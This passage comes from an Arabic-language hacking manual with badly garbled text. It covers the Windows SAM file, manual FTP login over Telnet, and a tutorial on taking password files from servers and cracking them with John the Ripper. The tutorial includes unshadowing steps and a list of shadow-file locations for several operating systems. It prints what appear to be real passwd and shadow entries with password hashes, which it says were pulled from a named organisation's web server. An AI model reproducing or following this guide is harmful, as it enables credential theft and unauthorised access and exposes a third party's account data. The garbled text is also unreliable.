ﺘ ﺤﻪاو ﻧﺴﺨﻪ ﻃﺎﻟﻤﺎاﻟﻨﻈﺎم ﯾﻌﻤ ﻞ ﺣ ﻗﻼ ع ﻣﻦ ﺎﻟﻨﻈﺎم وﻻ ﯾﺴﻤﺢﺑﻔ ))ﻫﺬااﻟﻤﻠ ﻒ ﻣﻐﻠ ﻖ ﻋﺎدةاﻻ ﻋﻨﺪاﻻ
ﺘﻮر (( ﺘ ﺮﯾ
ﻛﺎنﻟﺪﯾﻚ ﺻﻼ ﺣﯿﺎ ت ﺎﻻدﻣﻨﯿﺴ
ﺘﯿﺎ ﻃﻲ (())اﻟﻤﻠ ﻒاﻻ ﺣ
_/winnt/repair/sam or sam.
ﻓﻲاﻟﻮﯾﻨﺪوزاﻛ ﺲﺑﻲاﻟﺒ ﺮوﻓﯿﺸﯿﻨﺎ ل وا ﺻﺪارا تاﻟﻮﯾﺴﻠ ﺮ )) ﺳﯿ ﺮﻓ ﺮ -ادﻓﺎﻧﺴﺪ ﺳﯿ ﺮﻓ ﺮ ((
ﻟﻦﺗﺠﺪاﻟﻮﯾﻨﺪوزﻓﻲ ﻣﺠﻠﺪ WINNT
ﻮﻟﻜﻦ ﺳﯿﻜﻮنﻛﺎﻟﻮﯾﻨﺪوزاﻟﻌﺎدي. Windows
١ ٤٥
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$
اﻟﻜﺎﺗﺐ:اﻟﻜﻨﺪور
$$$$$$$$$$
ﻣﻘﺪﻣﻪ :
ﺳﺄﻋﯿﺪﺗﻌ ﺮﯾ ﻒ Telnetﻣﻦ ﺟﺪﯾﺪ وﻟﻜﻦﺑﻄ ﺮﯾﻘﻪاﻛﺜ ﺮﺑﺴﺎ ﻃﻪ ..
ﺘﺨﺪم ﻋﻨﻮاناﻟﺠﻬﺎز ﺘﺼ ﻞ ﯾﺴ ﺘﺨﺪمﻓﻲإﻧﺸﺎ ء و ﺻﻠﻪﺑﯿﻦ ﺟﻬﺎزﯾﻦ ،واﻟﺠﻬﺎزاﻟﻤ Telnetﻫﻮﺑ ﺮﻧﺎﻣ ﺞ ﯾﺴ
ﺘﻬﺪ ف )اﻟﺨﺎدم( ﯾﺸﻐ ﻞﺑ ﺮﻧﺎﻣ ﺞ آ ﺧ ﺮ ﺘﻢاﻻﺗﺼﺎ ل ﻋﻠﯿﻪ ،واﻟﺠﻬﺎزاﻟﻤﺴ ﻗﻢاﻟﻤﻨﻔﺬ Portﺎﻟﺬي ﺳﯿ ﺘﻬﺪ ف و ر ﺎﻟﻤﺴ
ﺘﺨﺪامأ ﺣﺪاﻟﺒ ﺮوﺗﻮﻛﻮﻻ ت . ﺘﻘﺒﺎ لﺑﺎﺳ
ﺘﻢ ﻋﻤﻠﯿﻪاﻹرﺳﺎ ل واﻻﺳ ﺘﻤﻊ ﻋﻠﻰ ﻫﺬااﻟﻤﻨﻔﺬ وﺗ )(Daemonﯾﺴ
ﻗﺎﻣﺔ ﺣﻮار ﺘﺼ ﻞ(ﺗ ﺮﯾﺪإ ﺘﻬﺪ ف( وأﻧ ﺖ )اﻟﻤﺘ ﺮ ضأن ﻫﻨﺎك رﺟ ﻞﻓﻲﻓ ﺮﻧﺴﺎ )اﻟﻤﺴ ﺗﺸﺒﯿﻪ ﻣﻦ ﺣﯿﺎﺗﻨﺎاﻟﻌﻤﻠﯿﺔ :ﻧﻔ
ﺘﺨﺪام وﺳﯿﻠﻪاﺗﺼﺎ ل ) (Telnetﻮﻟﻨﻔ ﺮ ضأﻧﻬﺎاﻟﻬﺎﺗ ﻒ ﻣﻌﻪ )و ﺻﻠﻪ( وأﻧ ﺖﻓﻲ ﻣﺼ ﺮ ..ﻓﻼﺑﺪﻟﻚ ﻣﻦاﺳ
ﺘ ﺤﺪ ث اﻟﺬي ﻻﺑﺪﻟﻠ ﺮﺟ ﻞأن ﯾ ﻀﻌﻪ ﻋﻠﻰأذﻧﻪ )(Daemonﻟﻜﻲ ﯾﺴﻤﻌﻚ ..وﻟﻨﻔ ﺮ ضأﯾ ﻀﺎأن ﻫﺬااﻟ ﺮﺟ ﻞ ﻻ ﯾ
ﺘﻘﺒﺎ ل(ﺘ ﺤﺪ ث )اﻹرﺳﺎ ل ﻮاﻻﺳ ﺘﻰﺗ ﺘﺨﺪم( ﺣ ﺘﺨﺪاماﻟﻔ ﺮﻧﺴﯿﺔ )اﻟﺒ ﺮوﺗﻮﻛﻮ لاﻟﻤﺴ اﻟﻌ ﺮﺑﯿﺔ ..إذنﻓﻼﺑﺪﻟﻚ ﻣﻦاﺳ
ﺑ ﺤ ﺮﯾﻪ .
ﺘ ﺞأن Telnetﻫﻮ ﻣﺠ ﺮد و ﺻﻠﻪ )ﻣﺜ ﻞاﻟﻬﺎﺗ ﻒ( ..ﻮاﻧﻪ ﻻﺑﺪﻟﻨﺎ ﻣﻦ ﻣﻌ ﺮﻓﺔاﻟﺒ ﺮوﺗﻮﻛﻮ ل ﺘﻨﻣﻤﺎ ﺳﺒ ﻖ ﻧﺴ
ﺘﻘﺒﺎ ل .ﻛﻤﺎاﻧﻪ ﻻﺑﺪﻟﻨﺎ ﻣﻦأن ﻧﻌ ﺮ فأﯾ ﻀﺎأﻧﻪ ﻻﺑﺪ ﻣﻦ ﺘﻰ ﻧﻨﺠﺢﻓﻲاﻹرﺳﺎ ل و ﺎﻻﺳ ﺘﺨﺪمﻓﻲاﻻﺗﺼﺎ ل ﺣ اﻟﻤﺴ
ﺘﺴﻤﻊ ﻋﻠﻰ ﺎﻟﻤﻨﻔﺬاﻟﻤ ﺮاداﻻﺗﺼﺎ ل ﻋﻠﯿﻪ . ﺑ ﺮﻧﺎﻣ ﺞ Daemonﯾ
ﺘﺨﺪام Telnetﻚ FTP Client ﺎﺳ
ﺘﺨﺪاﻣﻨﺎﺑ ﺮوﺗﻮﻛﻮ ل ﻧﻘ ﻞاﻟﻤﻠﻔﺎ ت FileTransfer Protocol ﺘﻢاﻻﺗﺼﺎ ل ﻋﻠﯿﻪﻓﻲ ﺣﺎﻟﻪاﺳ ﺎﻟﻤﻨﻔﺬاﻟﺬي ﺳﯿ
ﻓﻲاﻟﻐﺎﻟﺐ ﺳﯿﻜﻮن .. ٢١
ﺄﯾﻦاﻟﺼﻌﻮﺑﺔإذن ؟
ـ FTP Clientﯾﺠﺐ ﻋﻠﯿﻨﺎاﻹﻟﻤﺎمﺑﻘﺪرﻛﺒﯿ ﺮﺑﺒ ﺮوﺗﻮﻛﻮ ل ﺘﺨﺪم Telnetﻛ ﺎﻟﺼﻌﻮﺑﺔﺗﻜﻤﻦﻓﻲأﻧﻨﺎﻟﻜﻲ ﻧﺴ
!! FTP
ﺘﻌﺎﻣ ﻞ ﻣﻊ ﻫﺬااﻟﺒ ﺮوﺗﻮﻛﻮ ل ..ﻮﻟﻜﻦ ﻫﺬاﻟﻦ ﯾﻤﻨﻌﻨﻲ ﻣﻦ ﻋ ﺮ ضﺑﻌ ﺾاﻷﻣﺜﻠﺔ ﻹﻇﻬﺎرﻛﯿﻔﯿﺔاﻟ
ﺑﺪ ءاﻻﺗﺼﺎ ل
ﺘﺸﻐﯿ ﻞ Telnetﻮ ﺷﺒﻚ ﻋﻠﻰ ftp.zdnet.comﺑﺎﻟﻤﻨﻔﺬ ٢١ -١ﻗﻢﺑ
ﻮ ﻫﺬا ﻣﺎ ﺳﯿﻈﻬ ﺮﻟﻚ
Sources Code -ﺷﻔ ﺮة
220 l19-sj-zdnet.zdnet.com NcFTPd Server (licensed copy) ready.
ﻗﻊ zdnetﻮﻫﻲ ﺘﺨﺪمﻓﻲ ﻣﻮ ﻮ ﺎﻟﺴﻄ ﺮاﻟﺴﺎﺑ ﻖ ﯾﺴﻤﻲ Bannerﺎﻟﺨﺎ صﺑﺎ ل FTP Daemonﺎﻟﻤﺴ
ﻗﻢاﻟﻤﻮﺟﻮدﻓﻲاﻟﺒﺪاﯾﺔ ﯾﺪ ل ﻋﻠﻰ ﻧﺠﺎ ح ﺎﻻﺗﺼﺎ ل و ﺘﺸﺒﯿﻚ ﻋﻠﯿﻪ .واﻟ ﺮﺘﻢاﻟﻗﻊاﻟﺬي ﺳﯿ ﺘﻼ فاﻟﻤﻮ ﺘﻠ ﻒﺑﺎ ﺧ ﺗﺨ
ﻗﻢﺛﺎﺑ ﺖ . ﻫﻮ ر
ﺘﺨﺪم Usernameﻮﻛﻠﻤﺔاﻟﺴ ﺮ Password ..ﺑﻤﺎ ﺘﺨﺪاماﺳﻢاﻟﻤﺴ ﺘﺎﻟﯿﺔﻫﻲاﻟﻮﻟﻮجﺑﺎﺳ -٢اﻟﺨﻄﻮةاﻟ
ﺘﺎﻟﻲ:ﺘﺨﺪاﻣﻪﻓﻲاﻟﻮﻟﻮجﻟﻠﻨﻈﺎمﻛﺎﻟ ﺘﻢ ﺎﺳﺘﺨﺪم Anonymousﺳﯿ أن zdnetﺗﺪﻋﻢاﻟﻤﺴ
ﺘﺐ ﺘﻜ ﺳ
Sources Code -ﺷﻔ ﺮة
user anonymous
ﺘﺎﻟﻲﺘﺠﯿﺐاﻟﺨﺎدمﺑﺎﻟ ﻮ ﺳﯿﺴ
١ ٤٦
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
331 Guest login ok, send your complete e-mail address as password.
ﺘﺎﻟﻲ
ﺘﺐأﻧ ﺖاﻟ ﺛﻢﺗﻜ
Sources Code -ﺷﻔ ﺮة
pass @zorro
ﺘ ﺮوﻧﻲاﻟﺨﺎ صﺑﻚﻛﻜﻠﻤﺔﺘﺨﺪم Anonymousﺗﻘﻮمﺑﺈﻋﻄﺎ ء ﻋﻨﻮاناﻟﺒ ﺮﯾﺪاﻹﻟﻜ ﻮﺑﺎﻟﻄﺒﻊ ﻋﻨﺪاﻟﻮﻟﻮجﺑﺎﻟﻤﺴ
ﺘﻮي ﻋﻠﻰاﻟ ﺮﻣﺰ @ (
ﺘﺐأي ﺷﺊ ﯾﺄ ﺧﺬ ﺷﻜ ﻞاﻟﺒ ﺮﯾﺪ )أي ﯾ ﺤ
اﻟﺴ ﺮ ..وﺈذاﻟﻢﺗ ﺮدإﻋﻄﺎ ءﺑ ﺮﯾﺪكﻓﯿﻤﻜﻨﻚأنﺗﻜ
ﺘﺎﻟﻲ
ﺘﺠﯿﺐاﻟﺨﺎدمﺑﺎﻟﻮ ﺳﯿﺴ
١ ٤٧
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
LIST
ﺘﺎﻟﻲﻓﻲاﻟﻨﺎﻓﺬةاﻷوﻟﻰﺄﯾ ﻀﺎﺘﺠﯿﺐاﻟﺨﺎدمﺑﺎﻟ
ﺳﯿﺴ
Sources Code -ﺷﻔ ﺮة
ﺘﻊ
ﺘﻜﻢﺑﻬﺬااﻟﻤﻮ ﺿﻮ عاﻟﻤﻤ
ﺘﻄﻊأناﻣﻨﻊ ﻧﻔﺴﻲ ﻣﻦ ﻣﺸﺎرﻛ
ﺈﻟﻰ ﻫﻨﺎ وأﻇﻦأﻧﻨﻲﻗﺪﺗﻤﺎدﯾ ﺖ ..وﻟﻜﻨﻨﻲﻟﻢاﺳ
ﺘﻊﺑﺎﻟﻨﺴﺒﺔإﻟﻲ( .
)ﻣﻤ
١ ٤٨
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
$$$$$$$$$$
اﻟﻜﺎﺗﺐ:اﻟﻜﻨﺪور
$$$$$$$$$$
ﺘ ﺮا ق :
اﻹ ﺧ
~~~~~~~~~
-ﺎﻟﻤﻘﺪﻣﺔ .
ﻗﻊ ؟-ﻛﯿ ﻒأﺟﻤﻊ ﻣﻌﻠﻮﻣﺎ ت ﺣﻮ لاﻟﻤﻮ
ﺘﻢﻛﺸ ﻒ ﻧﻘﺎطاﻟ ﻀﻌ ﻒ ؟ -ﻛﯿ ﻒ ﯾ
ﺘﺸﻔﻪ ؟ ﺘﻐﻼ ل ﻧﻘﺎطاﻟ ﻀﻌ ﻒاﻟﻤﻜ -ﻛﯿ ﻒ ﯾﻤﻜﻦإﺳ
-ﻣﺎﻫﻮ ﻣﻠ ﻒﻛﻠﻤﺔاﻟﻤ ﺮور password file؟
-ﺑﻤﺎذا ﯾﻔﯿﺪﻧﻲ ﻫﺬااﻟﻤﻠ ﻒ ؟
-ﻛﯿ ﻒ ﯾﻤﻜﻦ ﻣﻌ ﺮﻓﺔﻛﻠﻤﺔاﻟﺴ ﺮ ﻣﻦ ﺧﻼ ل ﻣﻠ ﻒاﻟﺒﺎﺳﻮرد password file؟
-ﻣﺎاﻟﻔ ﺮ قﺑﯿﻦﺈذاﻛﺎناﻟﻤﻠ ﻒ )ﻣﺸﻔ ﺮ ) encryptionﻮإذاﻛﺎن )ﻣ ﻀﻠ ﻞ ) shadowed؟
ﺘﻢﻛ ﺴ ﺮه ؟
-ﻮﻣﺎذاﻟﻮﻛﺎن ﻣﻠ ﻒﻛﻠﻤﺔاﻟﻤ ﺮور ﻣﺸﻔ ﺮ ،ﻛﯿ ﻒ ﯾ
-ﻮﻟﻮﻛﺎن ﻣﻠ ﻒﻛﻠﻤﺔاﻟﻤ ﺮور ﻣ ﻀﻠ ﻞ ،ﻣﺎذا ﻋﻠﻲانأﻋﻤ ﻞ ؟
><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
ﻗﻊ ﻣﺎ -:
ﺎﻵن ﺳﻮ فأ ﺿﻊاﻟﻨﻘﺎطاﻷﺳﺎﺳﯿﻪﻟﻜﺸ ﻒ ﻧﻘﺎط ﺿﻌ ﻒ ﻋﻠﻰ ﻣﻮ
١ ٤٩
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
------------------------------------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer
Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp
Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network
Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:
noaccess:x:60002:60002:No Access User:/:
nobody4:x:65534:65534:SunOS 4.x Nobody:/:
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh
admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landmark:/bin/ksh
١ ٥٠
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
------------------------------------------------------------------------------------------------
ﺘﻮي ﺘﺼ ﺮﺑﺸﻜ ﻞﻛﺒﯿ ﺮ ،ﻓﻌﻨﺪ ﺳ ﺤﺒﻪﻛﺎن ﯾ ﺤ ﻗﺪﺗﻜﻮنأﻛﺜ ﺮﺑﻜﺜﯿ ﺮ ،ﺣﯿﺚأن ﻫﺬااﻟﻤﻠ ﻒاﻟﻤﻮ ﺿﺢﺑﺎﻷﻋﻠﻰأ ﺧ و
ﺘﺠﺎوز ١٠أﺳﻄ ﺮ وﻫﻲ ﻋﻠﻰ آﻻﻻ فاﻟﺴﻄﻮر ،ﻟﯿ ﺲﻛ ﻞ ﻣﻠﻔﺎ تﻛﻠﻤﺎ تاﻟﻤ ﺮورﺑﻬﺬااﻟ ﺤﺠﻢﻓﯿﻮﺟﺪ ﻣﻨﻬﺎ ﻣﻦ ﻻ ﯾ
اﻟﻤﻮﺟﻮدهﺑﻜﺜ ﺮه ،ﻋﻠﻰاﻟﻌﻤﻮمأﻧ ﺖاﻟ ﺤﯿﻦ ﻋﻠﯿﻚﺗﻌ ﺮ فﺑﺄن ﻣﻠ ﻒﻛﻠﻤﺔاﻟﻤ ﺮور ﻫﻮاﻟﺬيﻓﻲ دا ﺧﻠﻪﺗﻮﺟﺪ
ﺣﺴﺎﺑﺎ تاﻷﺷﺨﺎ صاﻟﻤ ﺮ ﺧ ﺺﻟﻬﻢﺑﺎﻟﺪ ﺧﻮ لاﻟﻰ ﺎﻟﺴﯿ ﺮﻓ ﺮ ......
root
ﺘﺨﺪم واﻟﻠﻲ ﻫﻮاﻟﺠﺬرroot ﻫﺬااﻟﺴﻄ ﺮ ﯾﻮ ﺿ ﺦاﻟﻤﺴ
ﺘ ﺤﯿ ﻞ ،
ﺘ ﻀﺢاﻧﻬﺎ ﻣ ﻀﻠﻠﻪ ،ﯾﻌﻨﻲ ﻣﻜﺎﻧﻬﺎ ﺎﻟﻌﻼﻣﺔ x ،ﻻﺗﻔﻜ ﺮﻓﻲﻛﺴ ﺮﻫﺎﻓﻬﺬا ﻣﺴ xﻫﻲﻛﻠﻤﺔاﻟﻤ ﺮور ،وﯾ
ﺘﻌ ﺮ فﺑﻌﺪﻗﻠﯿ ﻞﻛﯿ ﻒﺗﻔﻌ ﻞ ﻫﺬا..
ﻟﻜﻦ ﻋﻠﯿﻚاﻟﺒ ﺤﺚ ﻋﻦ ﻣﻠ ﻒﺛﺎﻧﻲﺗﻢﺗﺨﺰﯾﻦﻓﯿﻪﻛﻠﻤﺔاﻟﻤ ﺮور ،ﺳ
0
ﺘﺨﺪم ﻗﻢ ﺎﻟﻤﺴﻫﺬا ﻫﻮ ر
1
ﻗﻢاﻟﻤﺠﻤﻮﻋﻪ ﺮ
Super-User:/:/sbin/shو ﻫﺬا ﻣ ﺶ ﻣﻬﻢ
++++++++++++++++++++++++++++
ﺎﻟﺠﺰ ءاﻟﺜﺎﻟﺚ
-ﻣﺎاﻟﻔ ﺮ قﺑﯿﻦإذاﻛﺎناﻟﻤﻠ ﻒ )ﻣﺸﻔ ﺮ ) encryptionﻮإذاﻛﺎن )ﻣ ﻀﻠ ﻞ ) shadowed؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ﺎﻟﻤﻠ ﻒاﻟﻤ ﻀﻠ ﻞ shadow fileﯾﻜﻮن ﻣﻜﺎنﻛﻠﻤﺔاﻟﻤ ﺮور رﻣﺰ ﻣﺜ ﻞ *أو xﺄو #أو ! وﻫﺬا ﻣﺜﺎ لﻟﻬﺎ
ﺘﻮﺑﻪ وﻟﻜﻦ root:x:0:1:Super-User:/:/sbin/shﻟﻜﻦاﻟﻤﻠ ﻒاﻟﻤﺸﻔ ﺮﺗﻜﻮنﻛﻠﻤﺔ ﺎﻟﻤ ﺮور ﻣﻜ
ﻣﺸﻔ ﺮه ﻣﺜ ﻞ ﻫﺬه root:Q71KBZlvYSnVw:0:1:Super-User:/:/sbin/sh
١ ٥١
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
by Sola 97,John the Ripper Version 1.3 Copyright (c) 1996
Loaded 1 password
ﺘﺎجﻟﻤﻠ ﻒ
ـ brute forceﺄوﺑﺎﻟﻌ ﺮﺑﻲاﻟﻘﻮهاﻟﻌﻨﯿﻔﻪ ،وﻫﻲ ﻻﺗ ﺤ
ﻫﻨﺎك ﻃ ﺮﯾﻘﻪا ﺧ ﺮىﻟﻠﻜﺴ ﺮ وﻫﻲﺗﺴﻤﻰﺑ
١ ٥٢
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
ﺘﺎن و ٣ﺧﺎﻧﺎ ت وارﺑﻊﻗﺎم واﻟ ﺮﻣﻮز ﻣﻊﺑﻌ ﺾﻓﻲ ﺧﺎﻧ ﺘﺠ ﺮﺑﻪﻛ ﻞاﻟ ﺤ ﺮو ف واﻷر
wordlist ،ﻫﻲﺗﻘﻮمﺑ
ﺘﺨﺪم ﻣﻠﻔﺎ ت wordlistﻓﺬﻟﻚﻟﻦ ﯾﺄ ﺧﺬ ﺘﻰﺗﺼﯿﺐﻛﻠﻤﺔاﻟﻤ ﺮوراﻟﺼ ﺤﯿ ﺤﻪ ،وأﻧﺎاﻓ ﻀ ﻞانﺗﺴ و ﺧﻤ ﺲ ..اﻟ ﺦ ﺣ
ﺘﺠ ﺮﺑﻪاﻟﻤﻮ ﺿ ﺤﻪﻓﻲاﻟ ﺮﺳﻢﺑﺎﻷﻋﻠﻰ ذﻛ ﺮ تﺑﺄﻧﻪ ﺳ ﺮﻋﺔﺗﺠ ﺮﺑﻪ ﺎﻟﻜﻠﻤﺎ ت ﻣﻌﻚﻓﻲاﻻﺛﻮاﻧﻲﻓﻘﻂﻷن ﻋﻤﻠﯿﻪاﻟ
ﺘﺠﺎوز ٥٠٠٠ﻛﻠﻤﺔﻓﻲاﻟﺜﺎﻧﯿﻪ ،إذاﻟﻢﺗﻔﻠﺢ ﻣﻠﻔﺎ ت wordlistﺣﯿﻨﻬﺎإذﻫﺐاﻟﻰ ﺎﻟﻘﻮهاﻟﻌﻨﯿﻔﻪ brute ﯾ
ﺘﺨﺪم ﻃ ﺮﯾﻘﻪ brute forceﺎﻟﺴﺎﺑ ﻖ ذﻛ ﺮﻫﺎ ﺘﺎﻟﻲ ﯾﺠﻌ ﻞ john the ripperﯾﺴ .... forceاﻷﻣ ﺮاﻟ
john -i passwd
ﺛﻨﺎ ء ﻋﻤ ﻞﺘ ﺮأﺘﺠ ﺮﺑﻪ ﻫﺬهاﻟﻄ ﺮﯾﻘﻪإ ﺿﻐﻂإﻧ ﺣﯿﺚ passwdﻫﻮ ﻣﻠ ﻒﻛﻠ ﻤﺔاﻟﻤ ﺮوراﻟﻤ ﺮادﻛﺴ ﺮه ،إذاﻗﻤ ﺖﺑ
ﺘ ﺮىاﻟﻰأﯾﻦﺗﻮ ﺻ ﻞ ... اﻟﺒ ﺮﻧﺎﻣ ﺞﻟ
-ﻮﻟﻮﻛﺎن ﻣﻠ ﻒﻛﻠﻤﺔاﻟﻤ ﺮور ﻣ ﻀﻠ ﻞ ،ﻣﺎذا ﻋﻠﻲانأﻋﻤ ﻞ ؟
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ﺪاﺋﻤﺎ ﺳﻮ فﺗﻮاﺟﻪﻛﻠﻤﺔ ﻣ ﺮور ﻣ ﻀﻠﻠﻪ ،ﻟﻜﻦﻫﻨﺎك ﻃ ﺮﯾﻘﻪﺗﺴﻤﻰ Unshadowﻟ ﺤ ﻞ ﻫﺬهاﻟﻤﺸﻜﻠﻪ !!
ﺈذا ﻮاﺟﻬ ﺖ ﻣﻠ ﻒ ﻣ ﻀﻠ ﻞ ﻋﻠﯿﻚاﻟﺒ ﺤﺚ ﻋﻦ ﻣﻠ ﻒﺛﺎﻧﻲ ﯾﺴﻤﻰ ﻣﻠ ﻒاﻟﺸﺎدو )ﻣﻠ ﻒاﻟﻈ ﻞ( shadow file
ﺘﺎﻟﻲ :وﻫﺬااﻟﻤﻠ ﻒ ﯾﻮﺟﺪﻓﻲاﻣﻜﻨﻪ ﻣﻌﯿﻨﻪ وﻛ ﻞ ﻧﻈﺎمﺗﺸﻐﯿ ﻞﻟﻪ ﻣﻜﺎن ﯾﻮ ﺿﻊﺑﻪ ﻫﺬااﻟﻤﻠ ﻒ ،ﺎﻟﯿﻚاﻟﺠﺪو لاﻟ
* = Linux : /etc/shadow token
ﺘﻌﺪدهاﺷﻬ ﺮﻫﺎ ﻫﻮ * = SunOS : /etc/shadow tokenﯾﺄ ﺧﺬأﺷﻜﺎ ل ﻣ
* = FreeBSD : /etc/master.passwd or /etc/shadow tokenﻮاﻟﺠﺪﯾﺪ ﻫﻮ x
IRIX : /etc/shadow token = x
! = AIX : /etc/security/passwd token
* = ConvexOS : /etc/shadow or /etc/shadpw token
tokenﺗﻌﻨﻲاﻟ ﺮﻣﺰاﻟﺬي ﯾﻮﺟﺪﻓﻲاﻟﻤﻠ ﻒ passwd ،ﻮﻫﺬا ﯾﻔﯿﺪﻓﻲﺗﺴﻬﯿ ﻞاﻟﻤﻬﻤﻪ ،ﯾﻌﻨﻲﻟﻮ ﻣﺜﻼﻟﻘﯿ ﺖ
ﻋﻼﻣﻪ !ﺑﺪ لﻛﻠﻤﻪاﻟﻤ ﺮورﻓﻬﺬا ﯾﻌﻨﻲانﻛﻠﻤﺔاﻟﻤ ﺮور ﻣﺴﺠﻠﻪﻓﻲ /etc/security/passwd ،ﻟﻘﺪ
ﺘﻌﻨ ﺖﺑﺎﻟﺠﺪو لاﻟﺴﺎﺑ ﻖ ذﻛ ﺮه ،ﻣﺜﺎ ل ﻋﻠﻰ ﻣﻠ ﻒ ﺷﺎدو )أﻛ ﺮر ﻣﻠ ﻒ ﺷﺎدوﻫﻮاﻟﻤﻠ ﻒاﻟﺬيﺗﺨﺰنﻓﯿﻪﻛﻠﻤﺔ إﺳ
اﻟﻤ ﺮوراﻟﺼ ﺤﯿ ﺤﻪ(
ﻫﺬا ﻣﻠ ﻒ shadow
------------------------------------------------------------------------------------------------
root:EpGw4GekZ1B9U:11390:::::: bin:NP:6445:::::: sys:NP:6445::::::
adm:IyEDQ6VoRlLHM:10935:::::: #admin:9z8VMm6Ovcvsc:10935::::::
lp:NP:6445::::::
------------------------------------------------------------------------------------------------
ﻧﻼ ﺣﻆانﻛﻠﻤﺎ تاﻟﺴ ﺮ ﻣﻮﺟﻮده
ﺎﻟﺨﻄﻮهاﻷ ﺧﯿ ﺮه وﻫﻲ دﻣ ﺞ ﻣﻠ ﻒاﻟﺒﺎﺳﻮرد passwd fileﻣﻊ shadow passwdﻟﻨ ﺤﺼ ﻞ ﻋﻠﻰ ﻣﻠ ﻒ
ﺘﻜﺎﻣ ﻞ وﻧﻘﺪﻣﻪاﻟﻰﺑ ﺮاﻣ ﺞاﻟﻜﺴ ﺮاﻟﺴﺎﺑ ﻖﺬﻛ ﺮﻫﺎ... ﻣ
ﻫﺬا ﻣﻠ ﻒﺑﺎﺳﻮرد ﺣﺼﻠﻨﺎ ﻋﻠﯿﻪ ﻣﻦ http://wilsonweb2.hwwilson.com/etc/passwd
------------------------------------------------------------------------------------------------
root:x:0:1:Super-User:/:/sbin/sh daemon:x:1:1::/: bin:x:2:2::/usr/bin:
sys:x:3:3::/: adm:x:4:4:Admin:/var/adm: lp:x:71:8:Line Printer
Admin:/usr/spool/lp: smtp:x:0:0:Mail Daemon User:/: uucp:x:5:5:uucp
Admin:/usr/lib/uucp: nuucp:x:9:9:uucp
Admin:/var/spool/uucppublic:/usr/lib/uucp/uucico listen:x:37:4:Network
Admin:/usr/net/nls: nobody:x:60001:60001:Nobody:/:
١ ٥٣
hi_HaCkEr & MaXhAk2000 Sites UnDeR UtTaCk www.3asfh.com/vb
www:x:102:1001::/web:/bin/csh
mirrors:x:102:1001::/web/mirrors:/web/mirrors/menu
sid:x:103:10::/export/home/sid:/bin/ksh
mirror:x:104:1::/home/mirror:/bin/sh
admin:x:105:1::/home/admin:/bin/sh
jerome:x:106:1::/home/jerome:/bin/sh erl:x:102:1::/home/erl:/bin/sh
landmark:x:1000:1000::/web/landmark:/bin/ksh
------------------------------------------------------------------------------------------------
ﻧﻌ ﺮ ف ﻣﻦ ﺧﻼ لاﻟﺠﺪو لاﻟﺴﺎﺑ ﻖ ذﻛ ﺮهﺑﺄنﻛﻠﻤﺔ ﺎﻟﻤ ﺮوراﻟﺼ ﺤﯿ ﺤﻪﻓﻲx ﺎﻟﻤﻮ ﺿﺢ واﻟﻠﻲﻫﻮtoken ـ ﻮﻣﻦاﻟ
/etc/shadow اﻟﺪﻟﯿ ﻞ
ﺘﺼﻔﺢاﻟﻰ ﺘﻮﺟﻪﺑﺎﻟﻤ ﺈذن ﻧ
http://wilsonweb2.hwwilson.com/etc/shadow
ﻟﻨ ﺤﺼ ﻞ ﻋﻠﻰ ﺎﻟﻤﻠ ﻒ
------------------------------------------------------------------------------------------------
root:XOT4AiUKMRcKQ:10643:::::: daemon:NP:6445::::::
bin:NP:6445:::::: sys:NP:6445:::::: adm:NP:6445:::::: lp:NP:6445::::::
smtp:NP:6445:::::: uucp:NP:6445:::::: nuucp:NP:6445::::::
listen:*LK*::::::: nobody:NP:6445:::::: noaccess:NP:6445::::::
nobody4:NP:6445:::::: www:WJctaI.8rcSe2:10507::::::
mirrors:gg9p.5kwGw1MY:10911:::::: sid:stXldZKnujFYo:10515::::::
mirror:iMPWwbrU.gB4k:10601:::::: admin:hDhB5YYKyWgQw:10976::::::
jerome:XDqnOl32tPoGo:10976:::::: erl:0jE9Xem4aJYeI:10982::::::
landmark:0jCgWu6vl8g0s:11185::::::
------------------------------------------------------------------------------------------------
ﻮﻫﻜﺬا ﻣﻊ ﺟﻤﯿﻊ، ﻓﻲ ﻣﻠ ﻒاﻟﺒﺎﺳﻮردx ﻧﻘﻮمﺑﻨﺴ ﺦﻛﻠﻤﺎ تاﻟﺴ ﺮاﻟﻤﻮﺟﻮدهﻓﯿﻪ وﻟﺼﻘﻬﺎ ﻣﻜﺎن ﻋﻼﻣﻪ
ﺘﻜﺎﻣ ﻞ وﻧﻘﺪﻣﻪاﻟﻰﺑ ﺮاﻣ ﺞ ﺎﻟﻜﺴ ﺮاﻟ ﺤﺴﺎﺑﺎ تﻟﻨ ﺤﺼ ﻞ ﻋﻠﻰ ﻣﻠ ﻒﻛﻠﻤﺔ ﻣ ﺮورﻛﺎﻣ ﻞ وﻣ
-: ﻣﻼ ﺣﻈﻪ ﻣﻬﻤﻪ
